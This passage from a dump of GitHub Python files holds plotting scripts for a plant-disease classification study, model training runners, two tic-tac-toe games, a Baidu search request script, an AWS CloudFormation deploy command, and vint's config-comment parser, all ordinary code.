name', fontsize=12)\n    plt.ylabel('Image number', fontsize=12)\n    plt.tight_layout()\n    plt.savefig('../fig/original_data_statistics.bar.png', dpi=300)\n    plt.show()\n\n\ndef train_acc_loss_plot():\n    folders = ['../data/lab/', '../data/field/', '../data/mixed/']\n    csv_files = []\n    for fld in folders:\n        cf = sorted(glob.glob(fld + 'output/*loss*csv'))\n        csv_files.extend(cf)\n\n    plt.rcParams['ytick.labelsize'] = 12\n    plt.rcParams['xtick.labelsize'] = 12\n    fig, axs = plt.subplots(nrows=3, ncols=3, facecolor='w', figsize=(12, 12))\n    axs = axs.flatten()\n    for i, path in enumerate(csv_files):\n        df = pd.read_csv(path, index_col=0)\n        if i < 3:\n            df = df.iloc[:15, ]\n        xlim = df.shape[0]\n        l1 = axs[i].plot(range(1, xlim + 1), df['train_acc'], lw=2, color='#F65429', label='Train Acc')\n        l2 = axs[i].plot(range(1, xlim + 1), df['val_acc'], lw=2, color='#DB3725', label='Val Acc')\n        axs[i].set_ylim(0, 1.1)\n        axs[i].set_yticks(ticks=np.arange(0, 1.05, 0.1))\n\n        ax1 = axs[i].twinx()\n        l3 = ax1.plot(range(1, xlim + 1), df['train_loss'], lw=2, color='#3D93C5', label='Train Loss')\n        l4 = ax1.plot(range(1, xlim + 1), df['val_loss'], lw=2, color='#3382A3', label='Val Loss')\n\n        lns = l1 + l2 + l3 + l4\n        labels = [l.get_label() for l in lns]\n\n        plt.xticks(ticks=range(1, xlim + 1, 3))\n\n        axs[i].grid(ls='-.')\n\n    axs[0].legend(lns, labels, fontsize=12, loc=7)\n\n    axs[0].set_ylabel('Lab', fontsize=16)\n    axs[3].set_ylabel('Field', fontsize=16)\n    axs[6].set_ylabel('Mixed', fontsize=16)\n\n    axs[6].set_xlabel('EfficientNet B0', fontsize=16)\n    axs[7].set_xlabel('MobileNet V3s', fontsize=16)\n    axs[8].set_xlabel('ResNet 34', fontsize=16)\n\n    plt.tight_layout()\n    plt.savefig('../fig/train_acc_loss.png', dpi=300)\n    plt.show()\n\n\ndef cross_test_plot():\n    predict_path = sorted(glob.glob('../data/cross_tested/*csv'))\n    models = [path.split('/')[-1].split('_')[0] for path in predict_path]\n    sources = [path.split('/')[-1].split('_')[1] for path in predict_path]\n    targets = [path.split('/')[-1].split('_')[2][:-4] for path in predict_path]\n    f = lambda x: x.split('/')[-2]\n    accs = []\n    for fn in predict_path:\n        df = pd.read_csv(fn, index_col=0)\n        df['true_label'] = df['img'].apply(f)\n        acc = accuracy_score(df['true_label'], df['cla'])\n        accs.append(acc)\n    result = pd.DataFrame({'models': models, 'sources': sources, 'targets': targets, 'acc': 
accs})\n field = result[result['sources'] == 'field']\n lab = result[result['sources'] == 'lab']\n mixed = result[result['sources'] == 'mixed']\n\n from matplotlib.pyplot import bar\n plt.rcParams['ytick.labelsize'] = 12\n colors = {'lab': '#AE3D3A', 'mixed': '#3382A3', 'field': '#304E6C'}\n models_labels = ['EfficientNet B0', 'MobileNet V3 Small', 'ResNet34']\n\n fig, axs = plt.subplots(nrows=1, ncols=3, sharex=True, figsize=(15, 5), facecolor='w')\n # lab on field\n b1 = axs[0].bar(x=np.arange(3) - 0.1, height=lab['acc'].values[0::2], width=0.2, color=colors['field'],\n label='Test on Field')\n b2 = axs[0].bar(x=np.arange(3) + 0.1, height=lab['acc'].values[1::2], width=0.2, color=colors['mixed'],\n label='Test on Mixed')\n axs[0].set_ylim(0, 1)\n axs[0].set_ylabel('Accuracy', fontsize=14)\n axs[0].set_title('Train on Lab', fontsize=16)\n axs[0].set_xticks([0, 1.05, 2], labels=models_labels, fontsize=14)\n axs[0].xaxis.set_ticks_position('none')\n\n b3 = axs[1].bar(x=np.arange(3) - 0.1, height=mixed['acc'].values[0::2], width=0.2, color=colors['field'],\n label='Test on Field')\n b4 = axs[1].bar(x=np.arange(3) + 0.1, height=mixed['acc'].values[1::2], width=0.2, color=colors['lab'],\n label='Test on Lab')\n print(mixed['acc'].values[1::2])\n axs[1].set_ylim(0, 1)\n axs[1].set_ylabel('Accuracy', fontsize=14)\n axs[1].set_title('Train on Mixed', fontsize=16)\n axs[1].set_xticks([0, 1.05, 2], labels=models_labels, fontsize=14)\n axs[1].xaxis.set_ticks_position('none')\n b5 = axs[2].bar(x=np.arange(3) - 0.1, height=field['acc'].values[0::2], width=0.2, color=colors['lab'],\n label='Test on '\n 'Lab')\n b6 = axs[2].bar(x=np.arange(3) + 0.1, height=field['acc'].values[1::2], width=0.2, color=colors['mixed'],\n label='Test '\n 'on '\n 'Mixed')\n axs[2].set_ylim(0, 1)\n axs[2].set_ylabel('Accuracy', fontsize=14)\n axs[2].set_title('Train on Field', fontsize=16)\n\n axs[2].set_xticks([0, 1.05, 2], labels=models_labels, fontsize=14)\n axs[2].xaxis.set_ticks_position('none')\n\n legends = [bar([0], [0], color=colors['field'], label='Test on Field'),\n bar([0], [0], color=colors['mixed'], label='Test on Mixed'),\n bar([0], [0], color=colors['lab'], label='Test on Lab')]\n axs[2].legend(handles=legends, loc=0, frameon=False, fontsize=16)\n\n axs[0].bar_label(b1, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[0].bar_label(b2, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[1].bar_label(b3, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[1].annotate('0.976', xy=(0.2, 0.9), fontsize=12)\n axs[1].annotate('0.965', xy=(1.2, 0.9), fontsize=12)\n axs[1].annotate('0.981', xy=(1.8, 0.9), fontsize=12)\n axs[2].bar_label(b5, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[2].bar_label(b6, label_type='edge', fmt=\"%.3f\", fontsize=12)\n\n plt.yticks(fontsize=14)\n plt.tight_layout()\n plt.savefig('../fig/cross_test_row.png', dpi=300)\n # plt.savefig('../fig/cross_test_row.tiff', dpi=300)\n plt.show()\n\n\ndef get_partial_data2frame():\n train_val_fns = sorted(glob.glob('../data/partial/*/output/*acc*csv'))\n val_accs = []\n for fn in train_val_fns:\n df = pd.read_csv(fn, index_col=0)\n val_accs.append(df.val_acc.max())\n test_fns = sorted(glob.glob('../data/partial/*/output/*predict*.csv'))\n test_acc = []\n for fn in test_fns:\n df = pd.read_csv(fn, index_col=0)\n df['true_label'] = df.img.apply(lambda x: x.split('/')[4])\n tsc = accuracy_score(df.true_label, df.cla)\n test_acc.append(tsc)\n models = ['Efficient', 'MobileNet', 'ResNet'] * 10\n a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n a = 
np.asarray(a).reshape(-1, 1)\n a = a.repeat(3, axis=1).flatten().tolist()\n df = pd.DataFrame.from_dict({'percent': a, 'models': models, 'val acc': val_accs, 'test acc': test_acc})\n\n field_csvs = sorted(glob.glob('../data/part_test_on_field/*/*csv'))\n field_acc = []\n for fn in field_csvs:\n df = pd.read_csv(fn, index_col=0)\n df['true_label'] = df.img.apply(lambda x: x.split('/')[3])\n fsc = accuracy_score(df.true_label, df.cla)\n field_acc.append(fsc)\n f_res = pd.DataFrame.from_dict({'percent': a, 'models': models, 'acc': field_acc})\n return df, f_res\n\n\ndef partial_valid_test_acc_plot():\n df, _ = get_partial_data2frame()\n colors = ['#F65429', '#EED364', '#3382A3']\n sns.set_palette(sns.color_palette(colors))\n p1 = sns.lineplot(x='percent', y='val acc', hue='models', data=df, marker='*', lw=2, ms=12, legend=True)\n sns.lineplot(x='percent', y='test acc', hue='models', data=df, marker='o', lw=1.5, ms=6, alpha=0.7, legend=False)\n handles, _ = p1.get_legend_handles_labels()\n l1 = plt.legend(handles=handles, labels=['EfficientNet B0', 'MobileNet V3 Small', 'ResNet 34'], frameon=False,\n fontsize=12, bbox_to_anchor=[0.55, 0.5])\n custom_scatter = [plt.scatter(0, 0, marker='*', label='Validation Accuracy', color='k'),\n plt.scatter(0, 0, marker='o', label='Test Accuracy', color='k')]\n l2 = plt.legend(handles=custom_scatter, fontsize=12, frameon=False, bbox_to_anchor=[0.55, 0.3])\n\n p1.add_artist(l1)\n p1.add_artist(l2)\n\n plt.xticks(ticks=np.arange(1, 11, 1), labels=['{}%'.format(i) for i in range(10, 110, 10)], fontsize=12)\n plt.xlabel('Percentage', fontsize=14)\n plt.ylabel('Accuracy', fontsize=14)\n plt.savefig('../figs/lab_add2field_val_test_acc.png', dpi=300)\n plt.show()\n\n\ndef partial_test_on_filed_plot():\n _ , df = get_partial_data2frame()\n sns.lineplot(x=df['percent'], y=df['acc'], hue='models', linewidth=2,\n marker='*', ms=12, data=df)\n plt.legend(labels=['EfficientNet B0', 'MobileNet V3 Small', 'ResNet 34'], frameon=False, fontsize=12, loc=[0.5, 0.25])\n plt.xticks(ticks=np.arange(1, 11, 1), labels=['{}%'.format(i) for i in range(10, 110, 10)], fontsize=12)\n plt.xlabel('Percentage', fontsize=14)\n plt.ylabel('Accuracy', fontsize=14)\n plt.savefig('../figs/percent_test_on_field.png', dpi=300)\n plt.show()\n\n\ndef get_diseases2frame(criterion):\n total_test_fns = sorted(glob.glob(criterion))\n dfs = []\n for path in total_test_fns:\n condition = path.split('/')[0][2:]\n model = path.split('/')[-1].split('_')[0]\n df = pd.read_csv(path, index_col=0)\n df['true_label'] = df['img'].apply(lambda x: x.split('/')[3])\n matrix = confusion_matrix(df['true_label'], df['cla'], normalize='true')\n results = pd.DataFrame.from_dict({'diseases': df['true_label'].unique(), 'accuracy': matrix.diagonal()})\n results = results.sort_values(by='diseases', ascending=True)\n results['condition'] = condition\n results['model'] = model\n dfs.append(results)\n total = pd.concat(dfs, axis=0)\n total = total.reset_index(drop=True)\n return total\n\n\ndef get_diseases_individual2frame():\n limits_fns = sorted(glob.glob('./plant_individual/*/*/output/*predict_test.csv'))\n dfs = []\n for path in limits_fns:\n condition = path.split('/')[2]\n model = path.split('/')[-1].split('_')[0]\n df = pd.read_csv(path, index_col=0)\n df['true_label'] = df['img'].apply(lambda x: x.split('/')[5])\n matrix = confusion_matrix(df['true_label'], df['cla'], normalize='true')\n results = pd.DataFrame.from_dict({'diseases': df['true_label'].unique(), 'accuracy': matrix.diagonal()})\n results = 
results.sort_values(by='diseases', ascending=True)\n        results['condition'] = condition\n        results['model'] = model\n        dfs.append(results)\n    limit_df = pd.concat(dfs, axis=0)\n    limit_df = limit_df.reset_index(drop=True)\n    return limit_df\n\n\ndef diseases_acc_plot():\n    total = get_diseases2frame(criterion='./*/output/*test.csv')\n    limit_df = get_diseases_individual2frame()\n    diseases = total.diseases.unique().tolist()\n    diseases = [dis.replace('_', ' ') for dis in diseases]\n\n    print(total.shape)\n    print(limit_df.shape)\n\n    plt.rcParams['xtick.labelsize'] = 12\n    plt.rcParams['ytick.labelsize'] = 12\n    fig, axs = plt.subplots(nrows=1, ncols=6, sharey=True, figsize=(8, 6), facecolor='w')\n    i = 0\n    for md in ['EfficientNet', 'MobileNetV3', 'ResNet']:\n        tdf = total[total['model'] == md]\n        ldf = limit_df[limit_df['model'] == md]\n        tdata = tdf.accuracy.values.reshape(3, -1).T\n        ldata = ldf.accuracy.values.reshape(3, -1).T\n        p1 = axs[i].imshow(tdata, cmap='coolwarm_r')\n        p2 = axs[i + 1].imshow(ldata, cmap='coolwarm_r')\n        axs[i].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n        axs[i + 1].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n        axs[i].set_yticks(range(0, 14, 1), diseases)\n        axs[i + 1].set_yticks(range(0, 14, 1), diseases)\n        axs[i].set_title('a')\n        axs[i + 1].set_title('b')\n        i += 2\n\n    plt.tight_layout()\n    fig.text(0.3, 0.15, 'EfficientNet B0', fontsize=12)\n    fig.text(0.48, 0.15, 'MobileNet V3 Small', fontsize=12)\n    fig.text(0.71, 0.15, 'ResNet 34', fontsize=12)\n    fig.colorbar(p2, ax=axs, shrink=0.6)\n\n    plt.savefig('../figs/diseases_acc_change.png', dpi=300)\n    plt.show()\n\n\ndef precision_recall_f1_plot():\n    \"\"\"\n    There are too many values to present as tables, so plot them instead.\n    :return:\n    \"\"\"\n    fns = sorted(glob.glob('../data/tables/?????_[!v]*'))\n    dfs = []\n    for fn in fns:\n        model = fn.split('_')[2][:-4]\n        cond = fn.split('_')[1]\n        df = pd.read_csv(fn, index_col=0)\n        df = df.iloc[:-3, :-1]\n        df['conditions'] = cond\n        df['models'] = model\n        dfs.append(df)\n    res = pd.concat(dfs, axis=0)\n\n    colors = ['#AE3D3A', '#3382A3', '#304E6C']\n    fig, axs = plt.subplots(nrows=3, ncols=1, sharex=True, figsize=(6, 16))\n\n    for i, cla in enumerate(['precision', 'recall', 'f1-score']):\n        legend = False\n        if i == 0:\n            legend = True\n        s = sns.scatterplot(x=res.index, y=res[cla], hue='conditions', style='models', data=res, palette=colors, ax=axs[i], legend=legend)\n        labels = [name.replace('_', ' ') for name in res.index.unique().tolist()]\n        s.set_xticks(ticks=range(0, 14), labels=labels, rotation=90, fontsize=14)\n        s.set_ylabel(cla.capitalize().replace('-', ' '), fontsize=14)\n    s.legend(ncol=2, frameon=False, fontsize=10, bbox_to_anchor=[0.5, 0.35])\n    plt.tight_layout()\n    plt.savefig('../fig/total_prf.svg', dpi=600)\n    plt.show()\n\n\ndef cam_plot():\n    origin = sorted(glob.glob('../data/cam_maps/origin_test/*/*'))\n    model_folders = sorted(glob.glob('../data/cam_maps/[!c]*[!t]'))\n    images_list = {}\n    for fld in model_folders:\n        criterion = os.path.join(fld, '*', '*')\n        images = sorted(glob.glob(criterion))\n        images_list[fld] = images\n\n    # random.seed(46)\n    # random_index = random.choices(range(4450), k=40)\n    select = [4216, 2798, 3813, 810, 98, 265, 256, 307]\n    titles = [key[2:].replace('_', ' on ') for key in images_list.keys()]\n    titles = ['EfficientNet-Field', 'EfficientNet-Lab', 'EfficientNet-Mixed', 'MobileNet-Field', 'MobileNet-Lab',\n              'MobileNet-Mixed', 'ResNet-Field', 'ResNet-Lab', 'ResNet-Mixed']\n\n    fig, axs = plt.subplots(ncols=10, nrows=8, figsize=(14, 12), facecolor='w')\n    for i, idx in 
enumerate(select):\n img1_path = origin[idx]\n img1 = Image.open(img1_path)\n w, h = img1.size\n left = (w - 224) / 2\n top = (h - 224) / 2\n right = (w + 224) / 2\n bottom = (h + 224) / 2\n img_resize = img1.crop((left, top, right, bottom))\n axs[i, 0].imshow(img_resize)\n axs[i, 0].axis('off')\n j = 1\n for key, values in images_list.items():\n img2_path = values[idx]\n img2 = plt.imread(img2_path)\n axs[i, j].imshow(img2)\n axs[i, j].axis('off')\n if i == 0:\n axs[i, 0].set_title('Origin', fontsize=12)\n axs[i, j].set_title(titles[j - 1], fontsize=12)\n j += 1\n plt.subplots_adjust(wspace=0.05, hspace=0.05)\n plt.tight_layout()\n plt.savefig('../fig/cam_plot1.svg', dpi=600)\n plt.show()\n\n\ndef precision_recall_f1score_heatmap(columns):\n total_df = pd.read_csv('../data/tables/heatmap_total.csv', index_col=0)\n individual_df = pd.read_csv('../data/tables/heatmap_individual.csv', index_col=0)\n\n diseases = total_df.diseases.unique().tolist()\n diseases = [dis.replace('_', ' ') for dis in diseases]\n\n plt.rcParams['xtick.labelsize'] = 12\n plt.rcParams['ytick.labelsize'] = 12\n fig, axs = plt.subplots(nrows=1, ncols=6, sharey=True, figsize=(8, 6), facecolor='w')\n i = 0\n for md in ['EfficientNet', 'MobileNetV3', 'ResNet']:\n tdf = total_df[total_df['model'] == md]\n ldf = individual_df[individual_df['model'] == md]\n tdata = tdf[columns].values.reshape(3, -1).T\n ldata = ldf[columns].values.reshape(3, -1).T\n p1 = axs[i].imshow(tdata, cmap='coolwarm_r')\n p2 = axs[i + 1].imshow(ldata, cmap='coolwarm_r')\n axs[i].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n axs[i + 1].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n axs[i].set_yticks(range(0, 14, 1), diseases)\n axs[i + 1].set_yticks(range(0, 14, 1), diseases)\n axs[i].set_title('(a)')\n axs[i + 1].set_title('(b)')\n i += 2\n\n plt.tight_layout()\n fig.text(0.27, 0.15, 'EfficientNet B0', fontsize=12)\n fig.text(0.46, 0.15, 'MobileNet V3 Small', fontsize=12)\n fig.text(0.71, 0.15, 'ResNet 34', fontsize=12)\n cbar = fig.colorbar(p2, ax=axs, shrink=0.6)\n cbar.ax.set_ylabel(columns.capitalize().replace('-', ' '), fontsize=14, rotation=270, labelpad=15)\n\n plt.savefig('../fig/heatmap_'+columns+'.png', dpi=300)\n plt.show()\n\n\nif __name__ == '__main__':\n # data_statistics_bar_plot()\n # train_acc_loss_plot()\n # cross_test_plot()\n # partial_valid_test_acc_plot()\n # partial_test_on_filed_plot()\n # diseases_acc_plot()\n # precision_recall_f1_plot()\n # cam_plot()\n precision_recall_f1score_heatmap(columns='f1-score')","repo_name":"weathergit/Lab_field_diseases","sub_path":"src/mk_plots.py","file_name":"mk_plots.py","file_ext":"py","file_size_in_byte":18591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42536156538","text":"from data import batcher\nfrom sklearn.metrics import matthews_corrcoef, precision_score, recall_score\n\n\ndef train_runner(sess, network, train_batch_generator, current_iteration):\n cost_op = network.cost\n train_op = network.train_once\n test_op = network.choices\n\n batch_inputs, batch_targets = next(train_batch_generator)\n training_cross_entropy, train_choices, _ = sess.run([cost_op, test_op, train_op],\n {network.data_input: batch_inputs,\n network.data_targets: batch_targets,\n network.is_training_mode: True})\n train_mathews = matthews_corrcoef(batch_targets, train_choices)\n\n print(\"Iteration %d:\\tTraining Cross Entropy = %f\\tTrain Matthew's = %f\" % (\n current_iteration, training_cross_entropy, 
train_mathews))\n\n    return train_mathews\n\ndef test_runner(sess, network, iterable, batch_size, set_name):\n    test_op = network.choices\n    test_batch_generator = batcher.TestBatcher(iterable, batch_size)\n    all_test_targets = []\n    all_test_choices = []\n    for batch_inputs, batch_targets in test_batch_generator:\n        test_choices = sess.run(test_op, {network.data_input: batch_inputs,\n                                          network.data_targets: batch_targets,\n                                          network.is_training_mode: False})\n        all_test_targets.extend(batch_targets)\n        all_test_choices.extend(test_choices)\n    test_matthews = matthews_corrcoef(all_test_targets, all_test_choices)\n    test_precision = precision_score(all_test_targets, all_test_choices)\n    test_recall = recall_score(all_test_targets, all_test_choices)\n    print(\"%s Matthew's = %f\\tPrecision = %f\\tRecall = %f\" % (set_name, test_matthews, test_precision, test_recall))\n\n    return test_matthews\n\nclass ValidationPerformanceTracker:\n    # task: if performance did not improve in the last N runs, notify\n    def __init__(self, track_n):\n        self.track_n = track_n\n        self.records = []\n        self.IDs = []\n\n    def get_winning_ID(self, last_result, id):\n        if len(self.records) < self.track_n:\n            self.records.append(last_result)\n            self.IDs.append(id)\n            return None\n        else:\n            self.records.pop()\n            self.records.append(last_result)\n            self.IDs.pop()\n            self.IDs.append(id)\n\n            best_index, _ = max(enumerate(self.records), key=lambda item: item[1])\n            should_stop = best_index != len(self.records) - 1\n\n            if should_stop:\n                return self.IDs[best_index]\n            else:\n                return None","repo_name":"ramibotros/GridLSTM","sub_path":"model/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14328082166","text":"from random import randint\ntabu = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nwhile True:\n    for c in range(0, 9):\n        #BOARD\n        print('\\033[1;33m=\\033[m'*30)\n        for l in range(0, 3):\n            for c in range(0, 3):\n                print(f'\\033[1;36m{tabu[l][c]:^3}\\033[m', end='|')\n            print()\n        print('\\033[1;33m=\\033[m'*30)\n        #MOVE\n        jogada = int(input('\\033[1;33mWhat is your move:\\033[m '))\n        #CPU\n        cpu = randint(1, 9)\n        for l in range(0, 3):\n            for c in range(0, 3):\n                if jogada == tabu[l][c]:\n                    tabu[l][c] = 'X'\n\n        for l in range(0, 3):\n            for c in range(0,3):\n                if cpu == tabu[l][c]:\n                    tabu[l][c] = 'O'\n                    break\n\n        # WINNING PLAYER\n\n\n\n\n\nprint(f'{tabu[0]}')\nprint(f'{tabu[1]}')\nprint(f'{tabu[2]}')\n","repo_name":"w3ssfs/ExerciciosIniciantePython","sub_path":"Old Game.py","file_name":"Old Game.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35352132392","text":"from vint.ast.node_type import NodeType\nfrom typing import Dict, Any, Optional # noqa: F401\nimport re\nCONFIG_COMMENT_PATTERN = re.compile(r'^\\s*vint:\\s*')\nPOLICY_SWITCH_PATTERN = re.compile(r'(?:^|\\s)[-+]\\S+')\nNEXT_LINE_FLAG_PATTERN = 'next-line'\n\n\nclass ConfigComment:\n    def __init__(self, config_dict, is_only_next_line):\n        # type: (Dict[str, Any], bool) -> None\n        self.config_dict = config_dict\n        self.is_only_next_line = is_only_next_line\n\n\ndef parse_config_comment_node_if_exists(node):\n    # type: (Dict[str, Any]) -> Optional[ConfigComment]\n    if NodeType(node['type']) is not NodeType.COMMENT:\n        return None\n\n    comment_node = node\n    comment_content = comment_node['str']\n\n    if not is_config_comment(comment_content):\n        return None\n\n    return 
parse_config_comment(comment_content)\n\n\ndef parse_config_comment(comment_content):\n    # type: (str) -> Optional[ConfigComment]\n\n    if not is_config_comment(comment_content):\n        return None\n\n    striped_comment_content = CONFIG_COMMENT_PATTERN.sub('', comment_content)\n\n    policy_switches = [policy_switch.strip() for policy_switch in POLICY_SWITCH_PATTERN.findall(striped_comment_content)]\n    is_only_next_line = NEXT_LINE_FLAG_PATTERN in striped_comment_content\n\n    policies = {}\n    for policy_switch in policy_switches:\n        policy_name = policy_switch[1:]\n        is_enabling_switch = policy_switch[0] == '+'\n\n        policies[policy_name] = {\n            'enabled': is_enabling_switch\n        }\n\n    return ConfigComment(\n        config_dict={'policies': policies},\n        is_only_next_line=is_only_next_line\n    )\n\n\ndef is_config_comment(comment_content):\n    # type: (str) -> bool\n    return CONFIG_COMMENT_PATTERN.match(comment_content) is not None\n","repo_name":"Vimjas/vint","sub_path":"vint/linting/config/config_comment_parser.py","file_name":"config_comment_parser.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":685,"dataset":"github-code","pt":"66"} +{"seq_id":"28453813003","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\n# Initialize Tkinter window\r\nroot = tk.Tk()\r\nroot.title(\"Tic Tac Toe\")\r\nroot.geometry('1010x790')\r\n\r\n# Initialize game variables\r\nboard = {\"1\": \" \", \"2\": \" \", \"3\": \" \",\r\n         \"4\": \" \", \"5\": \" \", \"6\": \" \",\r\n         \"7\": \" \", \"8\": \" \", \"9\": \" \"}\r\nplayer = \"X\"\r\n\r\n# Function to update the game board\r\ndef update_board(button, spot):\r\n    global player\r\n    print(spot)\r\n    if board[spot] == \" \":\r\n        board[spot] = player\r\n        button.config(text=player)\r\n        check_winner()\r\n        switch_player()\r\n        root.title(\"Turn: \" + player)\r\n\r\n# Function to switch between players\r\ndef switch_player():\r\n    global player\r\n    if player == \"X\":\r\n        player = \"O\"\r\n    else:\r\n        player = \"X\"\r\n\r\n# Function to check if there is a winner\r\ndef check_winner():\r\n    if (board[\"1\"] == board[\"2\"] == board[\"3\"] != \" \" or\r\n        board[\"4\"] == board[\"5\"] == board[\"6\"] != \" \" or\r\n        board[\"7\"] == board[\"8\"] == board[\"9\"] != \" \" or\r\n        board[\"1\"] == board[\"4\"] == board[\"7\"] != \" \" or\r\n        board[\"2\"] == board[\"5\"] == board[\"8\"] != \" \" or\r\n        board[\"3\"] == board[\"6\"] == board[\"9\"] != \" \" or\r\n        board[\"1\"] == board[\"5\"] == board[\"9\"] != \" \" or\r\n        board[\"3\"] == board[\"5\"] == board[\"7\"] != \" \"):\r\n        root.after(10, end_game)\r\n\r\n# Function to end the game\r\ndef end_game():\r\n    global player\r\n    messagebox.showinfo(\"Game Over\", player + \" wins!\")\r\n    root.destroy()\r\n\r\nbutton1 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button1, \"1\"))\r\nbutton2 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button2, \"2\"))\r\nbutton3 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button3, \"3\"))\r\nbutton4 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button4, \"4\"))\r\nbutton5 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button5, \"5\"))\r\nbutton6 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button6, \"6\"))\r\nbutton7 = tk.Button(root, text=\"\", width=15, height=6,\r\n                    command=lambda: update_board(button7, \"7\"))\r\nbutton8 = tk.Button(root, 
text=\"\", width=15, height=6,\r\n command=lambda: update_board(button8, \"8\"))\r\nbutton9 = tk.Button(root, text=\"\", width=15, height=6,\r\n command=lambda: update_board(button9, \"9\"))\r\n\r\nlist_of_buttons = [button1, button2, button3, button4, button5, button6, button7, button8, button9]\r\ncount = 0\r\n\r\nfor i in list_of_buttons:\r\n count += 1\r\n i.grid(row = (count - 1) // 3, column = (count - 1) % 3)\r\n i.config(font=(\"Courier\", 28))\r\n\r\nroot.mainloop()","repo_name":"matt-berk/data-structures","sub_path":"school work/mini.py","file_name":"mini.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23935051399","text":"# 安装requests\n# pip install requests\n\nimport requests\nquery = input(\"请输入想搜索的\")\nurl=f'http://www.baidu.com/s?wd={query}'\nheaders ={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\"\n}\nres=requests.get(url, headers=headers)\n\n# code为状态码,text网页源码\nprint(res.text)\nres.close()","repo_name":"lifei-2019/crawlers","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12498559372","text":"\"\"\"\nCompanyInfo class\n\"\"\"\n\n\nclass CompanyInfo:\n \"\"\"\n This class represents company info\n \"\"\"\n\n def __init__(self, ticker: str, market_cap: float, free_float_market_cap: float) -> None:\n \"\"\"\n This method initializes CompanyInfo object\n :param ticker: ticker symbol\n :param market_cap: market cap\n :param free_float_market_cap: free float market cap\n \"\"\"\n super().__init__()\n self.symbol: str = ticker\n self.market_cap: float = market_cap\n self.free_float_market_cap: float = free_float_market_cap\n\n @classmethod\n def from_json(cls, ticker: str, json_result: dict):\n \"\"\"\n This method creates CompanyInfo object from json\n :param ticker: ticker symbol\n :param json_result: result\n :return: CompanyInfo object\n \"\"\"\n # It is possible that either of these keys are not present in the json. In that case, set market_cap to 0\n trade_info = json_result.get('marketDeptOrderBook', {}).get('tradeInfo', {})\n total_market_cap = trade_info.get('totalMarketCap', 0)\n ffmc = trade_info.get('ffmc', 0)\n return cls(\n ticker=ticker,\n market_cap=total_market_cap,\n free_float_market_cap=ffmc\n )\n","repo_name":"adityazagade/momentum-fund","sub_path":"model/company_info.py","file_name":"company_info.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4311084382","text":"from ..utils import aws, utils, conventions\nfrom ..services.cloudformation import validate_template, package_template, deploy_template, get_template, get_config, get_stack_details\nfrom . import options\n\n\ndef add_subparser(subparsers):\n parser = subparsers.add_parser(\n 'deploy',\n aliases=['dpl'],\n parents=[\n options.common(),\n options.template_config(),\n options.package_destination(),\n options.approve()\n ],\n help='Validates, Packages and Deploys the specified AWS CloudFormation template by creating and then executing a change set.'\n )\n parser.add_argument(\n '--output-template-file',\n '-o',\n help='The path to the file where the command writes the output AWS CloudFormation template. 
(default: packaged.yml)',\n        default='packaged.yml'\n    )\n    parser.set_defaults(subcommand=main)\n\n\ndef main(args):\n    session = aws.get_session(args.profile)\n    aws.display_session_info(session)\n    template = get_template(args.template)\n    config = get_config(args.config)\n\n    validate_template(\n        session,\n        template,\n        config\n    )\n\n    conventions.display_generated_values(config)\n\n    if not args.approve:\n        utils.get_confirmation()\n\n    packaged_yaml = package_template(\n        session,\n        args\n    )\n\n    success = deploy_template(\n        session,\n        config,\n        packaged_yaml,\n        args.approve\n    )\n\n    if success:\n        stack_name = conventions.generate_stack_name(config['Parameters'])\n        stack_details = get_stack_details(session, stack_name)\n        aws.display_cfn_stack_outputs(stack_details)\n","repo_name":"vinh3928/dhi-cloudformation-tools","sub_path":"cfn/subcommands/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26165556365","text":"from subprocess import Popen\nimport sys\nimport os\nexefile = 'winword.exe'\npathfile = r'c:/Program Files'\n\nclass checkdir:\n\n    def find_all(self, exefile, pathfile):\n        # Walk pathfile and collect every directory that contains exefile.\n        result = []\n        for root, dirs, files in os.walk(pathfile):\n            if exefile in files:\n                result.append(os.path.join(root, exefile))\n        return result\n","repo_name":"Robotz213/Convert2PDF","sub_path":"checkword.py","file_name":"checkword.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5084951720","text":"import numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport shapely\nimport pytest\nfrom 